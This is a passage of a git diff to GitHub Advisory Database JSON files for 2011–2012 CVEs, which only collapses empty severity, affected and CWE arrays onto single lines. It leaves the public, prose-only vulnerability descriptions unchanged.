a/advisories/unreviewed/2022/05/GHSA-jm5c-rgfp-cjhx/GHSA-jm5c-rgfp-cjhx.json b/advisories/unreviewed/2022/05/GHSA-jm5c-rgfp-cjhx/GHSA-jm5c-rgfp-cjhx.json index 9fd9f3c2eec..6aea84dd4be 100644 --- a/advisories/unreviewed/2022/05/GHSA-jm5c-rgfp-cjhx/GHSA-jm5c-rgfp-cjhx.json +++ b/advisories/unreviewed/2022/05/GHSA-jm5c-rgfp-cjhx/GHSA-jm5c-rgfp-cjhx.json @@ -7,12 +7,8 @@ "CVE-2012-2377" ], "details": "JGroups diagnostics service in JBoss Enterprise Portal Platform before 5.2.2, SOA Platform before 5.3.0, and BRMS Platform before 5.3.0, is enabled without authentication when started by the JGroups channel, which allows remote attackers in adjacent networks to read diagnostics information via a crafted IP multicast.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jmg6-3prv-3x7q/GHSA-jmg6-3prv-3x7q.json b/advisories/unreviewed/2022/05/GHSA-jmg6-3prv-3x7q/GHSA-jmg6-3prv-3x7q.json index 4f3f931ff36..eb8b7bbce86 100644 --- a/advisories/unreviewed/2022/05/GHSA-jmg6-3prv-3x7q/GHSA-jmg6-3prv-3x7q.json +++ b/advisories/unreviewed/2022/05/GHSA-jmg6-3prv-3x7q/GHSA-jmg6-3prv-3x7q.json @@ -7,12 +7,8 @@ "CVE-2012-1460" ], "details": "The Gzip file parser in Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat QuickHeal) 11.00, Command Antivirus 5.2.11.5, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, and VBA32 3.12.14.2 allows remote attackers to bypass malware detection via a .tar.gz file with stray bytes at the end. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different Gzip parser implementations.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jp2p-x75q-6xp5/GHSA-jp2p-x75q-6xp5.json b/advisories/unreviewed/2022/05/GHSA-jp2p-x75q-6xp5/GHSA-jp2p-x75q-6xp5.json index 693d7155419..2b1e5515246 100644 --- a/advisories/unreviewed/2022/05/GHSA-jp2p-x75q-6xp5/GHSA-jp2p-x75q-6xp5.json +++ b/advisories/unreviewed/2022/05/GHSA-jp2p-x75q-6xp5/GHSA-jp2p-x75q-6xp5.json @@ -7,12 +7,8 @@ "CVE-2012-3333" ], "details": "CRLF injection vulnerability in IBM Maximo Asset Management 7.x before 7.5.0.6 and SmartCloud Control Desk 7.x before 7.5.0.3 and 7.5.1.x before 7.5.1.2 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via a crafted parameter in a URL.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jp4m-c57w-j86f/GHSA-jp4m-c57w-j86f.json b/advisories/unreviewed/2022/05/GHSA-jp4m-c57w-j86f/GHSA-jp4m-c57w-j86f.json index 5286d7fe1b2..81b4bf02861 100644 --- a/advisories/unreviewed/2022/05/GHSA-jp4m-c57w-j86f/GHSA-jp4m-c57w-j86f.json +++ b/advisories/unreviewed/2022/05/GHSA-jp4m-c57w-j86f/GHSA-jp4m-c57w-j86f.json @@ -7,12 +7,8 @@ "CVE-2012-2442" ], "details": "Buffer overflow in the Video Manager in Nokia PC Suite 7.1.180.64 and earlier allows remote attackers to cause a denial of service via a crafted mp4 file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jp78-f6xg-rhj6/GHSA-jp78-f6xg-rhj6.json b/advisories/unreviewed/2022/05/GHSA-jp78-f6xg-rhj6/GHSA-jp78-f6xg-rhj6.json index 1d135218430..98a07725be3 100644 --- a/advisories/unreviewed/2022/05/GHSA-jp78-f6xg-rhj6/GHSA-jp78-f6xg-rhj6.json +++ b/advisories/unreviewed/2022/05/GHSA-jp78-f6xg-rhj6/GHSA-jp78-f6xg-rhj6.json @@ -7,12 +7,8 @@ "CVE-2012-2943" ], "details": "CRLF injection vulnerability in cryptographp.inc.php in Cryptographp allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the cfg parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jp83-4w56-5w6x/GHSA-jp83-4w56-5w6x.json b/advisories/unreviewed/2022/05/GHSA-jp83-4w56-5w6x/GHSA-jp83-4w56-5w6x.json index 37ecc5a4adf..9d4cb436488 100644 --- a/advisories/unreviewed/2022/05/GHSA-jp83-4w56-5w6x/GHSA-jp83-4w56-5w6x.json +++ b/advisories/unreviewed/2022/05/GHSA-jp83-4w56-5w6x/GHSA-jp83-4w56-5w6x.json @@ -7,12 +7,8 @@ "CVE-2012-1181" ], "details": "fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jpfx-8w27-cwrp/GHSA-jpfx-8w27-cwrp.json b/advisories/unreviewed/2022/05/GHSA-jpfx-8w27-cwrp/GHSA-jpfx-8w27-cwrp.json index b0c4a5c8d14..652c5fdc19d 100644 --- a/advisories/unreviewed/2022/05/GHSA-jpfx-8w27-cwrp/GHSA-jpfx-8w27-cwrp.json +++ b/advisories/unreviewed/2022/05/GHSA-jpfx-8w27-cwrp/GHSA-jpfx-8w27-cwrp.json @@ -7,12 +7,8 @@ "CVE-2012-1743" ], "details": "Unspecified vulnerability in the Oracle Clinical Remote Data Capture Option component in Oracle Industry Applications 4.6.0.x, 4.6.2, and 4.6.3 allows remote authenticated users to affect confidentiality, related to HTML Surround.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jpvf-8hj8-56qq/GHSA-jpvf-8hj8-56qq.json b/advisories/unreviewed/2022/05/GHSA-jpvf-8hj8-56qq/GHSA-jpvf-8hj8-56qq.json index deb40316260..c1442cb60c0 100644 --- a/advisories/unreviewed/2022/05/GHSA-jpvf-8hj8-56qq/GHSA-jpvf-8hj8-56qq.json +++ b/advisories/unreviewed/2022/05/GHSA-jpvf-8hj8-56qq/GHSA-jpvf-8hj8-56qq.json @@ -7,12 +7,8 @@ "CVE-2012-2179" ], "details": "libodm.a in IBM AIX 5.3, 6.1, and 7.1 allows local users to overwrite arbitrary files via a symlink attack on a temporary file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jq4q-7v6p-hvjv/GHSA-jq4q-7v6p-hvjv.json b/advisories/unreviewed/2022/05/GHSA-jq4q-7v6p-hvjv/GHSA-jq4q-7v6p-hvjv.json index 83537b50cbf..67fd4925bb0 100644 --- a/advisories/unreviewed/2022/05/GHSA-jq4q-7v6p-hvjv/GHSA-jq4q-7v6p-hvjv.json +++ b/advisories/unreviewed/2022/05/GHSA-jq4q-7v6p-hvjv/GHSA-jq4q-7v6p-hvjv.json @@ -7,12 +7,8 @@ "CVE-2012-4035" ], "details": "The new_password page in PBBoard 2.1.4 allows remote attackers to change the password of arbitrary user accounts via the member_id and new_password parameters to index.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jqh5-w95m-3mpg/GHSA-jqh5-w95m-3mpg.json b/advisories/unreviewed/2022/05/GHSA-jqh5-w95m-3mpg/GHSA-jqh5-w95m-3mpg.json index 156cd73750f..78ebb30e2b6 100644 --- a/advisories/unreviewed/2022/05/GHSA-jqh5-w95m-3mpg/GHSA-jqh5-w95m-3mpg.json +++ b/advisories/unreviewed/2022/05/GHSA-jqh5-w95m-3mpg/GHSA-jqh5-w95m-3mpg.json @@ -7,12 +7,8 @@ "CVE-2012-1582" ], "details": "Cross-site scripting (XSS) vulnerability in the wikitext parser in MediaWiki 1.17.x before 1.17.3 and 1.18.x before 1.18.2 allows remote attackers to inject arbitrary web script or HTML via a crafted page with \"forged strip item markers,\" as demonstrated using the CharInsert extension.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jr82-5fpr-xf2h/GHSA-jr82-5fpr-xf2h.json b/advisories/unreviewed/2022/05/GHSA-jr82-5fpr-xf2h/GHSA-jr82-5fpr-xf2h.json index c9648a4cf2b..96ec897c6ce 100644 --- a/advisories/unreviewed/2022/05/GHSA-jr82-5fpr-xf2h/GHSA-jr82-5fpr-xf2h.json +++ b/advisories/unreviewed/2022/05/GHSA-jr82-5fpr-xf2h/GHSA-jr82-5fpr-xf2h.json @@ -7,12 +7,8 @@ "CVE-2012-3035" ], "details": "Buffer overflow in Emerson DeltaV 9.3.1 and 10.3 through 11.3.1 allows remote attackers to cause a denial of service (daemon crash) via a long string to an unspecified port.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jrg6-fc48-2465/GHSA-jrg6-fc48-2465.json b/advisories/unreviewed/2022/05/GHSA-jrg6-fc48-2465/GHSA-jrg6-fc48-2465.json index 6418582d150..5a5a42ae6f7 100644 --- a/advisories/unreviewed/2022/05/GHSA-jrg6-fc48-2465/GHSA-jrg6-fc48-2465.json +++ b/advisories/unreviewed/2022/05/GHSA-jrg6-fc48-2465/GHSA-jrg6-fc48-2465.json @@ -7,12 +7,8 @@ "CVE-2012-2060" ], "details": "Cross-site scripting (XSS) vulnerability in the Admin tools module for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jrwq-x7vh-89x6/GHSA-jrwq-x7vh-89x6.json b/advisories/unreviewed/2022/05/GHSA-jrwq-x7vh-89x6/GHSA-jrwq-x7vh-89x6.json index 308d2da5916..7fb09a51a25 100644 --- a/advisories/unreviewed/2022/05/GHSA-jrwq-x7vh-89x6/GHSA-jrwq-x7vh-89x6.json +++ b/advisories/unreviewed/2022/05/GHSA-jrwq-x7vh-89x6/GHSA-jrwq-x7vh-89x6.json @@ -7,12 +7,8 @@ "CVE-2012-1561" ], "details": "Cross-site scripting (XSS) vulnerability in the Finder module 6.x-1.x before 6.x-1.26, 7.x-1.x, and 7.x-2.x before 7.x-2.0-alpha8 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the \"checkbox and radio button functionalities.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jrx8-2cjx-g9mh/GHSA-jrx8-2cjx-g9mh.json b/advisories/unreviewed/2022/05/GHSA-jrx8-2cjx-g9mh/GHSA-jrx8-2cjx-g9mh.json index 62e36d01300..88a0138b40e 100644 --- a/advisories/unreviewed/2022/05/GHSA-jrx8-2cjx-g9mh/GHSA-jrx8-2cjx-g9mh.json +++ b/advisories/unreviewed/2022/05/GHSA-jrx8-2cjx-g9mh/GHSA-jrx8-2cjx-g9mh.json @@ -7,12 +7,8 @@ "CVE-2012-3370" ], "details": "The SecurityAssociation.getCredential method in JBoss Enterprise Application Platform (EAP) before 5.2.0, Web Platform (EWP) before 5.2.0, BRMS Platform before 5.3.1, and SOA Platform before 5.3.1 returns the credentials of the previous user when a security context is not provided, which allows remote attackers to gain privileges as other users.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -88,9 +84,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jvp4-r2cv-v2cw/GHSA-jvp4-r2cv-v2cw.json b/advisories/unreviewed/2022/05/GHSA-jvp4-r2cv-v2cw/GHSA-jvp4-r2cv-v2cw.json index 382c9ab108d..0d9b69887ed 100644 --- a/advisories/unreviewed/2022/05/GHSA-jvp4-r2cv-v2cw/GHSA-jvp4-r2cv-v2cw.json +++ b/advisories/unreviewed/2022/05/GHSA-jvp4-r2cv-v2cw/GHSA-jvp4-r2cv-v2cw.json @@ -7,12 +7,8 @@ "CVE-2012-1630" ], "details": "Cross-site scripting (XSS) vulnerability in the Taxonomy Navigator module for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jvw2-9vxw-fhqh/GHSA-jvw2-9vxw-fhqh.json b/advisories/unreviewed/2022/05/GHSA-jvw2-9vxw-fhqh/GHSA-jvw2-9vxw-fhqh.json index e27bd4c24e9..8a4e520cac1 100644 --- a/advisories/unreviewed/2022/05/GHSA-jvw2-9vxw-fhqh/GHSA-jvw2-9vxw-fhqh.json +++ b/advisories/unreviewed/2022/05/GHSA-jvw2-9vxw-fhqh/GHSA-jvw2-9vxw-fhqh.json @@ -7,12 +7,8 @@ "CVE-2012-1813" ], "details": "eosfailoverservice.exe in C3-ilex EOScada before 11.0.19.2 allows remote attackers to cause a denial of service by sending a large amount of data to TCP port 12000.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jwmf-6p4j-pp9v/GHSA-jwmf-6p4j-pp9v.json b/advisories/unreviewed/2022/05/GHSA-jwmf-6p4j-pp9v/GHSA-jwmf-6p4j-pp9v.json index 13e9ccbd46b..026ec938988 100644 --- a/advisories/unreviewed/2022/05/GHSA-jwmf-6p4j-pp9v/GHSA-jwmf-6p4j-pp9v.json +++ b/advisories/unreviewed/2022/05/GHSA-jwmf-6p4j-pp9v/GHSA-jwmf-6p4j-pp9v.json @@ -7,12 +7,8 @@ "CVE-2012-2304" ], "details": "The Linkit module 7.x-2.x before 7.x-2.3 for Drupal, when using an entity access module, does not check permissions when searching for entities, which allows remote attackers to obtain sensitive information via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jx63-73f5-2r54/GHSA-jx63-73f5-2r54.json b/advisories/unreviewed/2022/05/GHSA-jx63-73f5-2r54/GHSA-jx63-73f5-2r54.json index d9b759d58c1..ba46528a21c 100644 --- a/advisories/unreviewed/2022/05/GHSA-jx63-73f5-2r54/GHSA-jx63-73f5-2r54.json +++ b/advisories/unreviewed/2022/05/GHSA-jx63-73f5-2r54/GHSA-jx63-73f5-2r54.json @@ -7,12 +7,8 @@ "CVE-2012-1426" ], "details": "The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, Command Antivirus 5.2.11.5, F-Prot Antivirus 4.6.2.117, K7 AntiVirus 9.77.3565, Norman Antivirus 6.06.12, and Rising Antivirus 22.83.00.03 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \\42\\5A\\68 character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jxff-rx6r-r788/GHSA-jxff-rx6r-r788.json b/advisories/unreviewed/2022/05/GHSA-jxff-rx6r-r788/GHSA-jxff-rx6r-r788.json index ed244780cf4..1814a9b5c8d 100644 --- a/advisories/unreviewed/2022/05/GHSA-jxff-rx6r-r788/GHSA-jxff-rx6r-r788.json +++ b/advisories/unreviewed/2022/05/GHSA-jxff-rx6r-r788/GHSA-jxff-rx6r-r788.json @@ -7,12 +7,8 @@ "CVE-2012-2707" ], "details": "The Hostmaster (Aegir) module 6.x-1.x before 6.x-1.9 for Drupal does not properly exit when users do not have access to package/task nodes, which allows remote attackers to bypass intended access restrictions and edit unauthorized nodes.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jxrm-34gh-67p6/GHSA-jxrm-34gh-67p6.json b/advisories/unreviewed/2022/05/GHSA-jxrm-34gh-67p6/GHSA-jxrm-34gh-67p6.json index a41764425a2..f38b36a6fb5 100644 --- a/advisories/unreviewed/2022/05/GHSA-jxrm-34gh-67p6/GHSA-jxrm-34gh-67p6.json +++ b/advisories/unreviewed/2022/05/GHSA-jxrm-34gh-67p6/GHSA-jxrm-34gh-67p6.json @@ -7,12 +7,8 @@ "CVE-2012-1741" ], "details": "Unspecified vulnerability in the Enterprise Manager for Fusion Middleware component in Oracle Fusion Middleware 10.1.3.5 allows remote attackers to affect confidentiality and integrity via unknown vectors related to User Administration Pages.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jxx8-r7x5-x5m5/GHSA-jxx8-r7x5-x5m5.json b/advisories/unreviewed/2022/05/GHSA-jxx8-r7x5-x5m5/GHSA-jxx8-r7x5-x5m5.json index 2a59ee7e1ab..68fd57b41c2 100644 --- a/advisories/unreviewed/2022/05/GHSA-jxx8-r7x5-x5m5/GHSA-jxx8-r7x5-x5m5.json +++ b/advisories/unreviewed/2022/05/GHSA-jxx8-r7x5-x5m5/GHSA-jxx8-r7x5-x5m5.json @@ -7,12 +7,8 @@ "CVE-2012-3145" ], "details": "Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Software 5.0.2, 5.0.5, 5.1.0, 5.2.0, 5.3.0 through 5.3.4, and 6.2.0 allows local users to affect confidentiality, related to BASE.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m26p-926q-cmv4/GHSA-m26p-926q-cmv4.json b/advisories/unreviewed/2022/05/GHSA-m26p-926q-cmv4/GHSA-m26p-926q-cmv4.json index 154f20cc7d3..351d4182137 100644 --- a/advisories/unreviewed/2022/05/GHSA-m26p-926q-cmv4/GHSA-m26p-926q-cmv4.json +++ b/advisories/unreviewed/2022/05/GHSA-m26p-926q-cmv4/GHSA-m26p-926q-cmv4.json @@ -7,12 +7,8 @@ "CVE-2012-2275" ], "details": "Multiple cross-site request forgery (CSRF) vulnerabilities in TestLink 1.9.3 and earlier allow remote attackers to hijack the authentication of users for requests that add, delete, or modify sensitive information, as demonstrated by changing the administrator's email via an editUser action to lib/usermanagement/userInfo.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m357-g5r5-9xrx/GHSA-m357-g5r5-9xrx.json b/advisories/unreviewed/2022/05/GHSA-m357-g5r5-9xrx/GHSA-m357-g5r5-9xrx.json index 05fe0b2c25c..f03eb1c5050 100644 --- a/advisories/unreviewed/2022/05/GHSA-m357-g5r5-9xrx/GHSA-m357-g5r5-9xrx.json +++ b/advisories/unreviewed/2022/05/GHSA-m357-g5r5-9xrx/GHSA-m357-g5r5-9xrx.json @@ -7,12 +7,8 @@ "CVE-2012-0734" ], "details": "IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 does not properly import jobs, which allows man-in-the-middle attackers to obtain sensitive information or possibly have unspecified other impact via a crafted job.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m494-qq5r-q4v8/GHSA-m494-qq5r-q4v8.json b/advisories/unreviewed/2022/05/GHSA-m494-qq5r-q4v8/GHSA-m494-qq5r-q4v8.json index 30c4b882931..af824a7f077 100644 --- a/advisories/unreviewed/2022/05/GHSA-m494-qq5r-q4v8/GHSA-m494-qq5r-q4v8.json +++ b/advisories/unreviewed/2022/05/GHSA-m494-qq5r-q4v8/GHSA-m494-qq5r-q4v8.json @@ -7,12 +7,8 @@ "CVE-2012-3576" ], "details": "Unrestricted file upload vulnerability in php/upload.php in the wpStoreCart plugin before 2.5.30 for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in uploads/wpstorecart.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m49q-m8jc-f334/GHSA-m49q-m8jc-f334.json b/advisories/unreviewed/2022/05/GHSA-m49q-m8jc-f334/GHSA-m49q-m8jc-f334.json index 91910616782..6089f538e2a 100644 --- a/advisories/unreviewed/2022/05/GHSA-m49q-m8jc-f334/GHSA-m49q-m8jc-f334.json +++ b/advisories/unreviewed/2022/05/GHSA-m49q-m8jc-f334/GHSA-m49q-m8jc-f334.json @@ -7,12 +7,8 @@ "CVE-2012-1762" ], "details": "Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.50, 8.51, and 8.52 allows remote authenticated users to affect integrity, related to TECH, a different vulnerability than CVE-2012-3111.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m4p3-r3rv-7rrm/GHSA-m4p3-r3rv-7rrm.json b/advisories/unreviewed/2022/05/GHSA-m4p3-r3rv-7rrm/GHSA-m4p3-r3rv-7rrm.json index 4f00dbe3d1d..d868950e1e2 100644 --- a/advisories/unreviewed/2022/05/GHSA-m4p3-r3rv-7rrm/GHSA-m4p3-r3rv-7rrm.json +++ b/advisories/unreviewed/2022/05/GHSA-m4p3-r3rv-7rrm/GHSA-m4p3-r3rv-7rrm.json @@ -7,12 +7,8 @@ "CVE-2011-5144" ], "details": "Open Business Management (OBM) 2.4.0-rc13 and earlier allows remote attackers to obtain configuration information via a direct request to test.php, which calls the phpinfo function.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m52h-228p-7rxq/GHSA-m52h-228p-7rxq.json b/advisories/unreviewed/2022/05/GHSA-m52h-228p-7rxq/GHSA-m52h-228p-7rxq.json index 0dfeb3917fa..fcd3475a472 100644 --- a/advisories/unreviewed/2022/05/GHSA-m52h-228p-7rxq/GHSA-m52h-228p-7rxq.json +++ b/advisories/unreviewed/2022/05/GHSA-m52h-228p-7rxq/GHSA-m52h-228p-7rxq.json @@ -7,12 +7,8 @@ "CVE-2011-5252" ], "details": "Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m596-76xf-p5r5/GHSA-m596-76xf-p5r5.json b/advisories/unreviewed/2022/05/GHSA-m596-76xf-p5r5/GHSA-m596-76xf-p5r5.json index 392a8adbc46..569d6d95a56 100644 --- a/advisories/unreviewed/2022/05/GHSA-m596-76xf-p5r5/GHSA-m596-76xf-p5r5.json +++ b/advisories/unreviewed/2022/05/GHSA-m596-76xf-p5r5/GHSA-m596-76xf-p5r5.json @@ -7,12 +7,8 @@ "CVE-2012-2072" ], "details": "Cross-site scripting (XSS) vulnerability in the Share Buttons (AddToAny) module 6.x-3.x before 6.x-3.4 for Drupal allows remote authenticated users with the administer addtoany permission to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m6hh-qxwf-f2wj/GHSA-m6hh-qxwf-f2wj.json b/advisories/unreviewed/2022/05/GHSA-m6hh-qxwf-f2wj/GHSA-m6hh-qxwf-f2wj.json index 94ba4332e7b..bbd637d20dc 100644 --- a/advisories/unreviewed/2022/05/GHSA-m6hh-qxwf-f2wj/GHSA-m6hh-qxwf-f2wj.json +++ b/advisories/unreviewed/2022/05/GHSA-m6hh-qxwf-f2wj/GHSA-m6hh-qxwf-f2wj.json @@ -7,12 +7,8 @@ "CVE-2012-2942" ], "details": "Buffer overflow in the trash buffer in the header capture functionality in HAProxy before 1.4.21, when global.tune.bufsize is set to a value greater than the default and header rewriting is enabled, allows remote attackers to cause a denial of service and possibly execute arbitrary code via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m6m8-g76c-567c/GHSA-m6m8-g76c-567c.json b/advisories/unreviewed/2022/05/GHSA-m6m8-g76c-567c/GHSA-m6m8-g76c-567c.json index a03e03ad321..bdb5e766782 100644 --- a/advisories/unreviewed/2022/05/GHSA-m6m8-g76c-567c/GHSA-m6m8-g76c-567c.json +++ b/advisories/unreviewed/2022/05/GHSA-m6m8-g76c-567c/GHSA-m6m8-g76c-567c.json @@ -7,12 +7,8 @@ "CVE-2012-3429" ], "details": "The dns_to_ldap_dn_escape function in src/ldap_convert.c in bind-dyndb-ldap 1.1.0rc1 and earlier does not properly escape distinguished names (DN) for LDAP queries, which allows remote DNS servers to cause a denial of service (named service hang) via a \"$\" character in a DN in a DNS query.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m74p-gqj9-cr9v/GHSA-m74p-gqj9-cr9v.json b/advisories/unreviewed/2022/05/GHSA-m74p-gqj9-cr9v/GHSA-m74p-gqj9-cr9v.json index f1443585e96..c5e0c388207 100644 --- a/advisories/unreviewed/2022/05/GHSA-m74p-gqj9-cr9v/GHSA-m74p-gqj9-cr9v.json +++ b/advisories/unreviewed/2022/05/GHSA-m74p-gqj9-cr9v/GHSA-m74p-gqj9-cr9v.json @@ -7,12 +7,8 @@ "CVE-2012-1463" ], "details": "The ELF file parser in AhnLab V3 Internet Security 2011.01.18.00, 